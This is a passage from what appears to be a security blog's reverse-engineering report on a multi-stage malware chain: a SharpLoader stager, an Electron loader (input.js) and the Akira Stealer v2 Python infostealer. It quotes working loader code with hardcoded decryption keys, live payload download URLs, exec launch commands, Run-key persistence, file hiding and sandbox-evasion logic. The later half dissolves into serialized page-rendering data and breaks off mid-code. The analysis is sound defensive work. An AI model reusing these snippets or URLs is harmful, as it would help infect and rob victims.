The endpoint is located under a legitimate-looking `.well-known` directory, often used for HTTPS certificate validation, which helps blend the URL into legitimate web traffic.
- **Payload Characteristics**: The payload is a **triple-obfuscated file** — Base64-encoded, GZip-compressed, and AES-encrypted. This obfuscation pipeline ensures the payload is opaque to most detection mechanisms unless fully executed and decrypted in memory.
- **Password Argument**: The string `UwUFufu1` is used at runtime to derive the AES key via SHA-256 and PBKDF2. Without this password, the payload cannot be decrypted, making offline analysis without context nearly impossible.
- **No Additional Arguments**: The corresponding switch indicates that no command-line parameters are passed to the decrypted .NET assembly, triggering its default execution path.

This stealthy invocation chain encapsulates SharpLoader’s core purpose: **fileless, adaptive, and secure payload delivery** through simple PowerShell syntax with maximum obfuscation and evasion.

## 4.7 Summary
{: .h4-font-size}

The SharpLoader construct exemplifies a highly refined and evasive malware staging technique that leverages native system components, reflection, and cryptography to operate almost entirely in-memory.

**Key Highlights:**

- **Bypassing AMSI**: Direct in-memory patching of the AMSI scan routine disables antivirus inspection without invoking detectable APIs.
- **Secure Payload Handling**: Retrieval of encrypted and compressed stage-two payloads ensures confidentiality and adds multiple layers of evasion.
- **Memory-Only Execution**: Decrypted payloads are never written to disk, making detection by traditional file-based scanners nearly impossible.
- **Modular and Reusable Architecture**: Through PowerShell parameters, SharpLoader can be flexibly reused across campaigns with varying payloads and runtime behaviors.

# 5. Deep Dive: `main.exe` – Electron-Based Malware Loader
{: .h3-font-size}

During reverse engineering, it became clear that `main.exe`, flagged by Microsoft Defender for Endpoint, was not a conventional binary but an **Electron-based malware loader**. It was delivered inside an archive which the initial binary downloaded and extracted at runtime. Once unpacked, the structure and contents strongly resembled a typical Electron application.

## 5.1 Recognizing Electron Structure
{: .h4-font-size}

The extracted folder included files such as:

- `chrome_100_percent.pak`, `v8_context_snapshot.bin`, `d3dcompiler_47.dll`
- `LICENSES.chromium` and `LICENSES.electron`
- A large `main.exe` binary (~150 MB)
- A `resources` folder containing `app.asar` and a secondary binary `elevate.exe`

![Packaged Windows 64-bit version of the desktop app](https://res.cloudinary.com/c4a8/image/upload/v1749796955/blog/pics/electron-app-windows-x64.png)

These are all strong indicators of an Electron app, which uses Chromium and Node.js to package JavaScript-based desktop applications. The presence of `elevate.exe`, a signed Microsoft binary often used to escalate privileges, raised further suspicion—it could be abused to launch child processes with elevated rights.

## 5.2 Unpacking and Static Analysis (Deep Dive)
{: .h4-font-size}

Rather than executing `main.exe`, I opted for a static analysis approach to avoid triggering any live behavior. My initial suspicion that `main.exe` was built with Electron was confirmed by locating the `app.asar` file inside the `resources` directory. In Electron apps, this archive contains all core application logic, such as JavaScript files, configuration (`package.json`), and assets, packed into a custom format for performance and obfuscation purposes.

The `.asar` archive is essentially a read-only, high-performance container similar to `.zip`, but optimized for Electron’s runtime. While not encrypted, it obfuscates code access, making static analysis more challenging unless unpacked.

To unpack it, I used the official `asar` tool provided via npm. The steps were:

```bash
npm install -g asar
asar extract app.asar extracted_app
```

Running the above commands extracted the content into a working folder (`extracted_app/`), which revealed the actual JavaScript application code. This included:

- `jscryter.js`, `input.js`, `obf.js`: These scripts form the malware logic. `jscryter.js` appears to orchestrate payload delivery, `input.js` defines configuration constants or command logic, and `obf.js` is a heavily obfuscated script likely containing the core payload logic.
- `package.json`, `package-lock.json`: Define the runtime environment
- `node_modules/`: Contains all dependencies like `axios`, `adm-zip`, `child_process`

The unpacked contents enabled complete visibility into the logic of the malware without requiring execution, which was essential for safe reverse engineering. This step confirmed that `main.exe` served purely as a runtime wrapper for the malicious scripts hidden inside `app.asar`.

## 5.3. What the Static Analysis Revealed
{: .h4-font-size}

By manually inspecting the code, I confirmed the malware logic was fully JavaScript-based, executed within the Electron runtime. The scripts were designed to:

- Download an encrypted payload (`pyth.zip`) from fallback URLs
- Extract the archive using `adm-zip`
- Perform string replacement to inject specific credentials or wallet addresses
- Launch the resulting Python file (`astor.py`) via `child_process.exec()` and `python.exe`

Crucially, the loader also included logic to **copy the initial binary into the user's AppData directory** if it wasn't already present—reinforcing persistence and maintaining the infection loop.

# 6. Deep Dive: `input.js` – The Encrypted JavaScript Payload Loader
{: .h3-font-size}

`input.js` is a critical component in the analyzed malware chain, functioning as the decryption and execution hub for an encrypted JavaScript payload. This script hides its core functionality behind a strong encryption layer and only reveals its behavior during runtime.

## 6.1 Encryption and Decryption Mechanics
{: .h4-font-size}

At first glance, `input.js` contains very little readable code. However, its primary purpose is to decrypt and execute a large obfuscated JavaScript blob stored within the script itself.

### 6.1.1 Decryption Logic

The script defines a `decrypt()` function that accepts four parameters:

- `encdata`: The encrypted Base64-encoded data
- `masterkey`: A plaintext passphrase
- `salt`: A cryptographic salt (Base64)
- `iv`: The initialization vector for AES decryption (Base64)

The decryption process is implemented using Node.js’s built-in `crypto` module. It proceeds as follows:

1. **Key Derivation:**
   The script derives a 256-bit symmetric key using PBKDF2 (Password-Based Key Derivation Function 2):

   ```js
   const key = crypto.pbkdf2Sync(
     masterkey,
     Buffer.from(salt, "base64"),
     100000,
     32,
     "sha512",
   );
   ```

   - **Hash function:** SHA-512
   - **Iterations:** 100,000
   - **Key length:** 32 bytes (256 bits)
   - **Salt:** Supplied as a Base64-decoded input

2. **AES-256-CBC Decryption:**
   The derived key is then used to create an AES decipher object:

   ```js
   const decipher = crypto.createDecipheriv(
     "aes-256-cbc",
     key,
     Buffer.from(iv, "base64"),
   );
   ```

   The encrypted payload is decrypted using standard CBC (Cipher Block Chaining) mode:

   ```js
   let decrypted = decipher.update(encdata, "base64", "utf8");
   decrypted += decipher.final("utf8");
   ```

3. **Dynamic Execution:**
   The decrypted JavaScript code is never written to disk. Instead, it is dynamically executed in memory using the `Function` constructor:

   ```js
   new Function("require", decrypted)(require);
   ```

   This technique enables fileless execution, reducing the chance of detection by traditional antivirus engines that rely on disk-based scanning.

This approach demonstrates a layered defense against reverse engineering by combining key derivation, strong encryption, and dynamic in-memory execution.

**Key Material and Encrypted Data**

The script includes the following hardcoded inputs:

- **Encrypted Data:** A massive Base64-encoded blob
- **Master Key:** `9uNXNGt8/7kN7ZiEvy1OdYNpbcnzkERs`
- **Salt:** `maXtklzMEZRY9dbul/XPSw==` (Base64-encoded)
- **IV:** `HwK6sOz7FBbL+YsrOxtYUg==` (Base64-encoded)

These are all embedded directly in the source code of `input.js`.

## 6.2 Post-Decryption Payload Behavior
{: .h4-font-size}

Once decrypted, the embedded payload becomes a full JavaScript program that performs the following malicious actions:

### 6.2.1 Environment Preparation

The decrypted payload begins by setting up its execution environment using built-in Node.js modules. This setup phase ensures that all required paths and working directories are clearly defined before any malicious behavior occurs.

- **Temporary Directory Resolution:**
  The malware calls `os.tmpdir()` to determine the path to the current system's temporary directory. This is a common tactic for malware as temporary folders are typically writable and less scrutinized by endpoint protection systems.

  ```js
  const tempDir = os.tmpdir();
  ```

- **Path Construction:**
  The script then constructs absolute paths for two important files:

  - `pyth.zip`: The archive that contains the actual second-stage Python-based stealer
  - `bnd.exe`: An optional executable file that may serve as a persistence backdoor or additional payload

  ```js
  const tempFile = path.join(tempDir, "pyth.zip");
  const binderFile = path.join(tempDir, "bnd.exe");
  ```

This path setup abstracts away OS-specific path syntax and enables the malware to operate seamlessly on any Windows system. It also sets the stage for the file download and unpacking mechanisms that follow.

### 6.2.2 Payload Download with Fallback Strategy

The second major phase of the decrypted JavaScript payload involves downloading a malicious ZIP archive from remote sources. This mechanism is designed with a multi-tiered fallback strategy to increase resilience and availability.

- **Primary Link Resolution via Rentry.co**
  The script begins by resolving a dynamic URL from a text paste service. It sends a GET request to:

  ```js
  const url = "https://rentry.co/7vzd22fg36hfdd33/raw";
  ```

  This returns a plain-text URL string pointing to the actual location of the `pyth.zip` archive. Using a redirection mechanism like this is a common obfuscation technique—it abstracts the real malicious URL and makes static detection harder.

- **Download Execution**
  The resolved URL is then requested using the Axios library with a response stream:

  ```js
  const fileResponse = await axios.get(fileUrl, { responseType: "stream" });
  ```

  The file is written to disk as `pyth.zip` in the system's temp directory:

  ```js
  const writer = fs.createWriteStream(tempFile);
  fileResponse.data.pipe(writer);
  ```

  This download is wrapped in a `Promise` to ensure synchronous completion before further logic is executed.

- **Fallback URLs**
  If the Rentry-based link fails, the script attempts hardcoded backup locations:

  ```
  https://cosmicdust.zip/.well-known/pki-validation/pyth.zip
  https://cosmoplanets.net/well-known/pki-validation/pyth.zip
  ```

  These domains are structured to appear as part of standard TLS validation folders, possibly mimicking Let's Encrypt or domain validation paths to reduce suspicion. Each fallback is retried with the same streaming and file-write logic.

- **Robustness and Obfuscation**
  This fallback mechanism ensures that the malware has multiple retrieval paths for its second-stage payload. The use of a dynamic pointer (`rentry.co`) and multiple failover mirrors makes the malware more resilient to takedowns, blocking, and DNS sinkholes.

This phase demonstrates careful operational planning by the malware authors, using layered redundancy and well-camouflaged delivery infrastructure.

- Downloads `pyth.zip` from the resolved URL
- If that fails, it attempts fallback mirrors:
  - `https://cosmicdust.zip/.well-known/pki-validation/pyth.zip`
  - `https://cosmoplanets.net/well-known/pki-validation/pyth.zip`

### 6.2.3 Payload Extraction and Manipulation

Once the `pyth.zip` archive has been successfully downloaded and saved to disk, the malware proceeds to extract its contents and prepare them for execution. This is accomplished using the `adm-zip` Node.js library, which allows programmatic handling of ZIP files.

- **ZIP Extraction:**

  ```js
  const zip = new AdmZip(tempFile);
  zip.extractAllTo(tempDir, true);
  ```

  This extracts all contents of the archive to the system's temporary directory. The `true` flag ensures overwriting of any existing files.

- **Archive Contents:**
  The archive `pyth.zip` includes a fully bundled Python project, including:

  - A directory structure resembling a legitimate Python package
  - Several Python modules and dependencies
  - The key file `astor.py` located at `Crypto/Util/astor.py`, which is the main stealer payload

- **Placeholder Replacement:**
  The malware performs dynamic substitution of predefined placeholders within `astor.py` to inject attacker-controlled configuration data such as:

  - A Discord webhook URL
  - Cryptocurrency wallet addresses (BTC, ETH, DOGE, LTC, XMR, etc.)
  - A user identifier (`%USERID%`)
  - An error status flag (`%ERRORSTATUS%`)

  ```js
  fs.readFile(extractedDir + "\Crypto\Util\astor.py", 'utf8', (err, data) => {
    let updatedFile = data
      .replace("%DISCORD%", <webhook>)
      .replace("%ADDRESSBTC%", <btc_address>)
      ...
      .replace("%ERRORSTATUS%", displayError ? "true" : "false");

    fs.writeFile(extractedDir + "\Crypto\Util\astor.py", updatedFile, 'utf8');
  });
  ```

This dynamic manipulation phase is essential. By delaying the insertion of attacker-controlled values until runtime, the payload avoids static detection and allows the operator to adapt targets and exfiltration endpoints without repackaging the archive.

- Replaces placeholder strings in `astor.py`:
  - Discord webhook: `%DISCORD%`
  - Wallet addresses: `%ADDRESSBTC%`, `%ADDRESSETH%`, etc.
  - User ID and error flags

### 6.2.4 Malware Execution

- Once the placeholder injection into astor.py is complete, the malware initiates execution of the stealer via a system call

  ```js
  exec("python.exe Crypto\\Util\\astor.py");
  ```

This command is executed using Node.js’s child_process.exec function and launches the embedded Python payload in a separate process. This specific execution pattern—python.exe with the argument Crypto\Util\astor.py—was observed in telemetry data collected by Microsoft Defender for Endpoint, making it a reliable detection artifact. In practice, the execution chain looks like this:

The full malware execution chain, as observed in Microsoft Defender for Endpoint telemetry, follows this sequence:

- `main.exe` (Electron-based container) invokes `node.exe`
- `node.exe` launches a command shell
- The command shell starts `python.exe`
- `python.exe` executes the file `astor.py`

### 6.2.5 Persistence Reinforcement

To ensure long-term presence on the infected system, the decrypted JavaScript payload includes logic to re-establish persistence by copying the initial binary to a hidden location within the user’s profile.

**Target Directory**

The file is copied to a directory that mimics legitimate Windows components:

```
%APPDATA%\Microsoft\Internet Explorer\UserData\Updater.exe
```

This location is intentionally chosen:

- %APPDATA% is writable by regular users and doesn’t require administrative privileges.
- The directory name mimics legitimate Microsoft application folders, making it less suspicious.

**Copy Mechanism:**

The copy operation uses Node.js’s fs.copyFileSync() function:

```js
fs.copyFileSync(
  process.env.PORTABLE_EXECUTABLE_FILE,
  path.join(
    process.env.APPDATA,
    "Microsoft",
    "Internet Explorer",
    "UserData",
    "Updater.exe",
  ),
);
```

- PORTABLE_EXECUTABLE_FILE is an environment variable automatically set by many packers (such as Electron) to reference the path of the executing binary.
- path.join(...) builds a fully-qualified destination path across different operating systems.

This logic executes only if the file is not already present—thus acting as a self-repair mechanism to restore the dropper if deleted.

**Role in the Malware Chain**
The presence of this copied Updater.exe ensures that:

- The loader can re-trigger itself across system reboots.
- The full infection chain (leading to main.exe, node.exe, and eventually astor.py) can re-initiate without relying on traditional registry persistence mechanisms, which are more likely to be monitored.

### 6.2.6 Optional Binder Execution

In addition to downloading and executing the main stealer payload (`astor.py`), the decrypted JavaScript also contains logic to optionally download and launch a secondary executable referred to as the "binder." This component can be used for persistence, distraction, or deployment of additional malware modules.

**Conditional Execution**

The binder logic is only activated if a specific flag is set:

```js
enableBinder = true;
```

In the sample analyzed, this value was set to `false` by default, but the logic remains embedded in the payload and can be trivially enabled in a different campaign or variant.

**Binder Download**
Logic",[12,11848,11849,11850,11853],{},"If activated, the script attempts to fetch an external binary from a URL defined by the ",[63,11851,11852],{},"%BINDERURL%"," placeholder:",[56,11855,11857],{"className":10662,"code":11856,"language":10664,"meta":65,"style":65},"const fileUrl = \"%BINDERURL%\";\nconst fileResponse = await axios.get(fileUrl, { responseType: \"stream\" });\nconst writer = fs.createWriteStream(binderFile);\nfileResponse.data.pipe(writer);\n",[63,11858,11859,11873,11893,11908],{"__ignoreMap":65},[102,11860,11861,11863,11866,11868,11871],{"class":104,"line":105},[102,11862,10671],{"class":285},[102,11864,11865],{"class":275}," fileUrl",[102,11867,10677],{"class":285},[102,11869,11870],{"class":289}," \"%BINDERURL%\"",[102,11872,1364],{"class":293},[102,11874,11875,11877,11879,11881,11883,11885,11887,11889,11891],{"class":104,"line":111},[102,11876,10671],{"class":285},[102,11878,11137],{"class":275},[102,11880,10677],{"class":285},[102,11882,11142],{"class":285},[102,11884,11145],{"class":293},[102,11886,11148],{"class":271},[102,11888,11151],{"class":293},[102,11890,11154],{"class":289},[102,11892,11157],{"class":293},[102,11894,11895,11897,11899,11901,11903,11905],{"class":104,"line":329},[102,11896,10671],{"class":285},[102,11898,11175],{"class":275},[102,11900,10677],{"class":285},[102,11902,11180],{"class":293},[102,11904,11183],{"class":271},[102,11906,11907],{"class":293},"(binderFile);\n",[102,11909,11910,11912,11914],{"class":104,"line":346},[102,11911,11191],{"class":293},[102,11913,11194],{"class":271},[102,11915,11197],{"class":293},[1254,11917,11918,11923],{},[1257,11919,399,11920,11922],{},[63,11921,11025],{}," file is saved into the system's temporary directory.",[1257,11924,11925,11926,11928],{},"Like ",[63,11927,10549],{},", the binary is downloaded using Axios in a streamed fashion to avoid loading the entire binary into memory.",[12,11930,11931],{},[251,11932,11933],{},"Execution Strategy",[12,11935,11936,11937,11939],{},"After 
successful download, the script invokes the downloaded binary using ",[63,11938,8804],{},", ensuring that it runs in a new shell context:",[56,11941,11943],{"className":10662,"code":11942,"language":10664,"meta":65,"style":65},"exec(`start cmd /c start ${binderFile}`, ...);\n",[63,11944,11945],{"__ignoreMap":65},[102,11946,11947,11949,11951,11954,11957,11960,11962,11965],{"class":104,"line":105},[102,11948,11582],{"class":271},[102,11950,545],{"class":293},[102,11952,11953],{"class":289},"`start cmd /c start ${",[102,11955,11956],{"class":293},"binderFile",[102,11958,11959],{"class":289},"}`",[102,11961,805],{"class":293},[102,11963,11964],{"class":285},"...",[102,11966,825],{"class":293},[12,11968,11969],{},"To increase reliability, the script includes retry logic:",[56,11971,11973],{"className":10662,"code":11972,"language":10664,"meta":65,"style":65},"setTimeout(() => {\n  exec(...);\n}, 5000);\n",[63,11974,11975,11987,11998],{"__ignoreMap":65},[102,11976,11977,11980,11983,11985],{"class":104,"line":105},[102,11978,11979],{"class":271},"setTimeout",[102,11981,11982],{"class":293},"(() ",[102,11984,11455],{"class":285},[102,11986,11458],{"class":293},[102,11988,11989,11992,11994,11996],{"class":104,"line":111},[102,11990,11991],{"class":271},"  exec",[102,11993,545],{"class":293},[102,11995,11964],{"class":285},[102,11997,825],{"class":293},[102,11999,12000,12003,12006],{"class":104,"line":329},[102,12001,12002],{"class":293},"}, ",[102,12004,12005],{"class":275},"5000",[102,12007,825],{"class":293},[12,12009,12010],{},"This ensures that even if the initial execution fails (e.g., due to system load or race conditions), the malware will reattempt launching the binary after a short delay.",[12,12012,12013],{},[251,12014,12015],{},"Use Cases for the Binder",[12,12017,12018],{},"While the exact purpose of the binder binary is not revealed in this particular sample (due to the placeholder URL), such components are commonly used 
to:",[1254,12020,12021,12024,12027,12030],{},[1257,12022,12023],{},"Reinstall or relaunch the primary malware components",[1257,12025,12026],{},"Display fake installers or decoy applications",[1257,12028,12029],{},"Deploy additional spyware, backdoors, or ransomware",[1257,12031,12032],{},"Modify system settings or disable security features",[41,12034,12036],{"id":12035},"_63-summary","6.3 Summary",[12,12038,47],{},[12,12040,12041,12043],{},[63,12042,10488],{}," is a highly obfuscated, encrypted JavaScript loader that uses industry-standard cryptography (PBKDF2 + AES-256-CBC) to protect its true purpose. Upon decryption, it operates as a fully capable second-stage loader that:",[1254,12045,12046,12051,12054,12059],{},[1257,12047,12048,12049,1288],{},"Retrieves further malware (",[63,12050,10549],{},[1257,12052,12053],{},"Modifies payload behavior dynamically",[1257,12055,12056,12057,1288],{},"Launches the actual stealer script (",[63,12058,8304],{},[1257,12060,12061,12062],{},"Reinforces persistence by restoring ",[63,12063,8296],{},[12,12065,12066,12067,12070],{},"Its combination of encryption, dynamic execution, modular payload fetching, and fileless operation showcases a ",[251,12068,12069],{},"highly advanced JavaScript-based malware architecture"," that leverages Node.js capabilities in an Electron shell.",[25,12072,12074,12075,1288],{"id":12073},"_7-deepdive-akira-stealer-v2-astorpy","7. DeepDive: Akira Stealer v2 (",[63,12076,8304],{},[12,12078,31],{},[41,12080,12082],{"id":12081},"_71-high-level-functionality","7.1. High-Level Functionality",[12,12084,47],{},[12,12086,12087,12088,12090],{},"Akira Stealer v2 (",[63,12089,8304],{},") is a multi-functional, modular infostealer malware written in Python. It is designed to exfiltrate a broad range of sensitive user data from both Chromium- and Firefox-based browsers, crypto wallets, communication clients (e.g., Discord, Telegram), and system files. 
It incorporates sophisticated anti-analysis mechanisms, registry-based persistence, clipboard hijacking, and memory injection techniques.",[41,12092,12094],{"id":12093},"_72-persistence-and-deployment","7.2 Persistence and Deployment",[12,12096,47],{},[186,12098,12100],{"id":12099},"_721-execution-chain-context","7.2.1 Execution Chain Context",[12,12102,192],{},[12,12104,12105,12107],{},[63,12106,8304],{}," is not executed standalone but is the final payload in a multi-stage attack chain:",[56,12109,12113],{"className":12110,"code":12111,"language":12112,"meta":65,"style":65},"language-plaintext shiki shiki-themes github-light github-dark","Updater.exe\n  └── main.exe (Electron app)\n        └── cmd.exe\n              └── python.exe astor.py\n","plaintext",[63,12114,12115,12120,12125,12130],{"__ignoreMap":65},[102,12116,12117],{"class":104,"line":105},[102,12118,12119],{},"Updater.exe\n",[102,12121,12122],{"class":104,"line":111},[102,12123,12124],{},"  └── main.exe (Electron app)\n",[102,12126,12127],{"class":104,"line":329},[102,12128,12129],{},"        └── cmd.exe\n",[102,12131,12132],{"class":104,"line":346},[102,12133,12134],{},"              └── python.exe astor.py\n",[12,12136,12137,12138,12140],{},"This structured execution chain allows each stage to evade detection by delegating malicious functionality to the next. ",[63,12139,8296],{}," initiates the sequence and is responsible for maintaining persistence.",[186,12142,12144],{"id":12143},"_722-registry-based-persistence","7.2.2 Registry-Based Persistence",[12,12146,192],{},[12,12148,12149,12150,12152],{},"Akira establishes persistence by writing a registry key under the current user’s Run path. 
This ensures that ",[63,12151,8296],{}," is executed on each system startup:",[56,12154,12158],{"className":12155,"code":12156,"language":12157,"meta":65,"style":65},"language-python shiki shiki-themes github-light github-dark","command = f'reg add HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run /v \"Realtek Audio\" /t REG_SZ /d \"{path}\\\\Updater.exe\" /f'\nos.system(command)\n","python",[63,12159,12160,12165],{"__ignoreMap":65},[102,12161,12162],{"class":104,"line":105},[102,12163,12164],{},"command = f'reg add HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run /v \"Realtek Audio\" /t REG_SZ /d \"{path}\\\\Updater.exe\" /f'\n",[102,12166,12167],{"class":104,"line":111},[102,12168,12169],{},"os.system(command)\n",[1254,12171,12172,12179,12187],{},[1257,12173,12174,1061,12177],{},[251,12175,12176],{},"Path",[63,12178,9343],{},[1257,12180,12181,1061,12184,12186],{},[251,12182,12183],{},"Value name",[63,12185,9351],{}," (chosen to appear benign)",[1257,12188,12189,12192,12193],{},[251,12190,12191],{},"Payload path",": Typically in ",[63,12194,12195],{},"AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\\\Updater.exe",[12,12197,12198,12199,12202],{},"This command silently writes the autorun entry via PowerShell or native ",[63,12200,12201],{},"os.system()"," execution.",[186,12204,12206],{"id":12205},"_723-file-concealment","7.2.3 File Concealment",[12,12208,192],{},[12,12210,12211],{},"To further obscure the binary from users and simple AV scans, the file is marked with hidden and system attributes:",[56,12213,12215],{"className":12155,"code":12214,"language":12157,"meta":65,"style":65},"subprocess.run([\"attrib\", \"+h\", \"+s\", destination_path])\n",[63,12216,12217],{"__ignoreMap":65},[102,12218,12219],{"class":104,"line":105},[102,12220,12214],{},[1254,12222,12223,12229],{},[1257,12224,12225,12228],{},[63,12226,12227],{},"+h",": Marks the file as hidden",[1257,12230,12231,12234],{},[63,12232,12233],{},"+s",": Marks the 
file as a protected system file",[12,12236,12237],{},"This effectively removes the file from standard Windows Explorer views and increases stealth.",[186,12239,12241],{"id":12240},"_724-reinfection-techniques","7.2.4 Reinfection Techniques",[12,12243,192],{},[12,12245,12246,12247,12249,12250,805,12253,12256],{},"The malware supports self-replication and reinfection through Electron application hijacking. Specifically, it replaces the ",[63,12248,8749],{}," archive in Electron-based desktop wallets (e.g., ",[251,12251,12252],{},"Exodus",[251,12254,12255],{},"Atomic Wallet",") to execute malicious JavaScript during legitimate app startup.",[12,12258,12259],{},"The logic looks for known wallet app paths:",[56,12261,12263],{"className":12155,"code":12262,"language":12157,"meta":65,"style":65},"path = os.getenv(\"APPDATA\") + \"\\\\Exodus\\\\resources\\\\app.asar\"\n",[63,12264,12265],{"__ignoreMap":65},[102,12266,12267],{"class":104,"line":105},[102,12268,12262],{},[12,12270,12271,12272,1013],{},"If the target file exists, it is overwritten with a weaponized archive. This ensures persistence even after manual cleanup of ",[63,12273,8296],{},[41,12275,12277,12278,1288],{"id":12276},"_73-anti-analysis-evasion-class-vmprotect","7.3 Anti-Analysis / Evasion (Class: ",[63,12279,12280],{},"VmProtect",[12,12282,47],{},[186,12284,12286],{"id":12285},"_731-introduction","7.3.1 Introduction",[12,12288,192],{},[12,12290,12291,12292,12294,12295,12297],{},"In modern malware campaigns, evading analysis in virtualized and sandboxed environments is critical to maintain stealth. The ",[3456,12293,8365],{}," implements a comprehensive VM/sandbox detection module (",[63,12296,12280],{},") that aggressively identifies and aborts execution under analyst-controlled environments. 
This report dissects each detection technique, provides the exact code snippets—including complete blacklist definitions—and outlines the analysis methodology used.",[186,12299,12301],{"id":12300},"_732-overview","7.3.2 Overview",[12,12303,192],{},[12,12305,399,12306,12308],{},[63,12307,12280],{}," class implements robust VM and sandbox detection to prematurely abort execution in analysis environments. It supports two detection levels:",[1254,12310,12311,12317],{},[1257,12312,12313,12316],{},[251,12314,12315],{},"Level 1",": Lightweight, fast checks",[1257,12318,12319,12322],{},[251,12320,12321],{},"Level 2",": In-depth, comprehensive probes",[12,12324,12325,12326,12329,12330,12333,12334,12337],{},"If ",[63,12327,12328],{},"VmProtect.isVM(level)"," returns ",[63,12331,12332],{},"True",", the malware calls ",[63,12335,12336],{},"sys.exit()",", preventing further analysis.",[186,12339,12341],{"id":12340},"_733-detection-levels","7.3.3 Detection Levels",[12,12343,192],{},[417,12345,420,12347],{"style":12346},"width:100%; border-collapse: collapse;",[438,12348,12349,420,12358,420,12368,420,12378,420,12387,420,12397,420,12406,420,12415],{},[426,12350,424,12351,424,12354,424,12356,420],{},[430,12352,12353],{},"Feature",[430,12355,12315],{"style":6608},[430,12357,12321],{"style":6608},[426,12359,424,12360,424,12363,424,12366,420],{},[443,12361,12362],{},"HTTPSimulation",[443,12364,12365],{"style":6608},"✔️",[443,12367,12365],{"style":6608},[426,12369,424,12371,424,12374,424,12376,420],{"style":12370},"background-color: #f5f5f5;",[443,12372,12373],{},"Computer-name blacklist",[443,12375,12365],{"style":6608},[443,12377,12365],{"style":6608},[426,12379,424,12380,424,12383,424,12385,420],{},[443,12381,12382],{},"User-account blacklist",[443,12384,12365],{"style":6608},[443,12386,12365],{"style":6608},[426,12388,424,12389,424,12392,424,12395,420],{"style":12370},[443,12390,12391],{},"Hardware-UUID 
blacklist",[443,12393,12394],{"style":6608},"❌",[443,12396,12365],{"style":6608},[426,12398,424,12399,424,12402,424,12404,420],{},[443,12400,12401],{},"Public-hosting API check",[443,12403,12394],{"style":6608},[443,12405,12365],{"style":6608},[426,12407,424,12408,424,12411,424,12413,420],{"style":12370},[443,12409,12410],{},"Registry & GPU hints",[443,12412,12394],{"style":6608},[443,12414,12365],{"style":6608},[426,12416,424,12417,424,12420,424,12422,420],{},[443,12418,12419],{},"Task-killing background",[443,12421,12365],{"style":6608},[443,12423,12365],{"style":6608},[52,12425],{"className":12426},[8535,8536],[186,12428,12430,12431,12433],{"id":12429},"_734-vmprotect-architecture","7.3.4 ",[63,12432,12280],{}," Architecture",[12,12435,192],{},[12,12437,399,12438,12440],{},[63,12439,12280],{}," class exposes the following primary methods:",[1254,12442,12443,12450,12457,12464,12471,12478,12485,12492],{},[1257,12444,12445],{},[251,12446,12447],{},[63,12448,12449],{},"checkUUID()",[1257,12451,12452],{},[251,12453,12454],{},[63,12455,12456],{},"checkComputerName()",[1257,12458,12459],{},[251,12460,12461],{},[63,12462,12463],{},"checkUsers()",[1257,12465,12466],{},[251,12467,12468],{},[63,12469,12470],{},"checkHosting()",[1257,12472,12473],{},[251,12474,12475],{},[63,12476,12477],{},"checkHTTPSimulation()",[1257,12479,12480],{},[251,12481,12482],{},[63,12483,12484],{},"checkRegistry()",[1257,12486,12487],{},[251,12488,12489],{},[63,12490,12491],{},"killTasks()",[1257,12493,12494],{},[251,12495,12496],{},[63,12497,12498],{},"isVM(level)",[12,12500,12501,12502,12505],{},"Each method returns a boolean or executes evasion steps. 
The ",[63,12503,12504],{},"isVM"," wrapper aggregates these checks based on the specified level.",[417,12507,420,12508],{"style":12346},[438,12509,12510,420,12522,420,12536,420,12550,420,12563,420,12576,420,12589,420,12602,420,12617],{},[426,12511,424,12512,424,12516,424,12519,420],{},[430,12513,12515],{"style":12514},"text-align: left;","Method",[430,12517,12518],{"style":12514},"Triggered By",[430,12520,12521],{"style":12514},"Description",[426,12523,424,12524,424,12528,424,12533,420],{},[443,12525,12526],{},[63,12527,12449],{},[443,12529,12530],{},[63,12531,12532],{},"isVM(2)",[443,12534,12535],{},"WMI UUID blacklist",[426,12537,424,12538,424,12542,424,12547,420],{"style":12370},[443,12539,12540],{},[63,12541,12456],{},[443,12543,12544],{},[63,12545,12546],{},"isVM(1,2)",[443,12548,12549],{},"Environment hostname match",[426,12551,424,12552,424,12556,424,12560,420],{},[443,12553,12554],{},[63,12555,12463],{},[443,12557,12558],{},[63,12559,12546],{},[443,12561,12562],{},"Username blacklist",[426,12564,424,12565,424,12569,424,12573,420],{"style":12370},[443,12566,12567],{},[63,12568,12470],{},[443,12570,12571],{},[63,12572,12532],{},[443,12574,12575],{},"IP hosting provider check via ip-api.com",[426,12577,424,12578,424,12582,424,12586,420],{},[443,12579,12580],{},[63,12581,12477],{},[443,12583,12584],{},[63,12585,12546],{},[443,12587,12588],{},"HTTPS interception detection",[426,12590,424,12591,424,12595,424,12599,420],{"style":12370},[443,12592,12593],{},[63,12594,12484],{},[443,12596,12597],{},[63,12598,12532],{},[443,12600,12601],{},"Registry & GPU driver artifacts",[426,12603,424,12604,424,12608,424,12614,420],{},[443,12605,12606],{},[63,12607,12491],{},[443,12609,12610,12613],{},[63,12611,12612],{},"isVM(...)"," spawn",[443,12615,12616],{},"Terminates known analysis processes",[426,12618,424,12619,424,12623,424,12626,420],{"style":12370},[443,12620,12621],{},[63,12622,12498],{},[443,12624,12625],{},"init",[443,12627,12628,12629,12631],{},"Aggregates checks 
and calls ",[63,12630,12491],{}," thread",[52,12633],{"className":12634},[8535,8536],[56,12636,12638],{"className":12155,"code":12637,"language":12157,"meta":65,"style":65},"@staticmethod\ndef isVM(level: int) -> bool:\n    # Always start background task-killer\n    Thread(target=VmProtect.killTasks, daemon=True).start()\n    if level == 1:\n        # Fast path: HTTPS, hostname & user\n        return (\n            VmProtect.checkHTTPSimulation()\n            or VmProtect.checkComputerName()\n            or VmProtect.checkUsers()\n        )\n    if level == 2:\n        # Deep scan: includes UUID, hosting, registry & GPU\n        try:\n            return (\n                VmProtect.checkHTTPSimulation()\n                or VmProtect.checkUUID()\n                or VmProtect.checkComputerName()\n                or VmProtect.checkUsers()\n                or VmProtect.checkHosting()\n                or VmProtect.checkRegistry()\n            )\n        except:\n            return False\n    return False\n",[63,12639,12640,12645,12650,12655,12660,12665,12670,12675,12680,12685,12690,12696,12702,12708,12714,12720,12726,12732,12738,12744,12750,12756,12762,12768,12774],{"__ignoreMap":65},[102,12641,12642],{"class":104,"line":105},[102,12643,12644],{},"@staticmethod\n",[102,12646,12647],{"class":104,"line":111},[102,12648,12649],{},"def isVM(level: int) -> bool:\n",[102,12651,12652],{"class":104,"line":329},[102,12653,12654],{},"    # Always start background task-killer\n",[102,12656,12657],{"class":104,"line":346},[102,12658,12659],{},"    